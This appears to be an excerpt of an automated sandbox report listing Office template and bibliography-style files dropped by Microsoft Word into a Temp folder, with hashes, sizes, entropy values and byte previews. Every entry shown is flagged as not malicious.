                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5596
                                                                                                                                              Entropy (8bit):7.875182123405584
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                              MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                              SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                              SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                              SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD699F.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):288
                                                                                                                                              Entropy (8bit):3.523917709458511
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                                                                              SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                                                                              SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                                                                              SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD699F.tmp\chicago.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):296658
                                                                                                                                              Entropy (8bit):5.000002997029767
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                              MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                              SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                              SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                              SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD69B0.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):286
                                                                                                                                              Entropy (8bit):3.538396048757031
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                                                                              SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                                                                              SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                                                                              SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD69B0.tmp\sist02.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):250983
                                                                                                                                              Entropy (8bit):5.057714239438731
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                              MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                              SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                              SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                              SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD69B1.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):274
                                                                                                                                              Entropy (8bit):3.438490642908344
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                              MD5:0F98498818DC28E82597356E2650773C
                                                                                                                                              SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                                                                              SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                                                                              SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD69B1.tmp\Element design set.dotx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):34415
                                                                                                                                              Entropy (8bit):7.352974342178997
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                              MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                              SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                              SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                              SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A00.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):286
                                                                                                                                              Entropy (8bit):3.4670546921349774
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                                              MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                                              SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                                              SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                                              SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A00.tmp\ThemePictureAlternatingAccent.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5630
                                                                                                                                              Entropy (8bit):7.87271654296772
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                              MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                              SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                              SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                              SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A01.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):290
                                                                                                                                              Entropy (8bit):3.5081874837369886
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                                                                              SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                                                                              SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                                                                              SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A01.tmp\gostname.xsl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):255948
                                                                                                                                              Entropy (8bit):5.103631650117028
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                              MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                              SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                              SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                              SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A02.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):254
                                                                                                                                              Entropy (8bit):3.4845992218379616
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                                              MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                                              SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                                              SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                                              SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A02.tmp\HexagonRadial.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6024
                                                                                                                                              Entropy (8bit):7.886254023824049
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                              MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                              SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                              SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                              SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A13.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):258
                                                                                                                                              Entropy (8bit):3.4692172273306268
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                                              MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                                              SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                                              SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                                              SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A13.tmp\pictureorgchart.glox

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):7370
                                                                                                                                              Entropy (8bit):7.9204386289679745
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                              MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                              SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                              SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                              SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6A14.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):314
                                                                                                                                              Entropy (8bit):3.5230842510951934
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                              MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                                                                              SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                                                                              SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                                                                              SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                                                                              Malicious:false
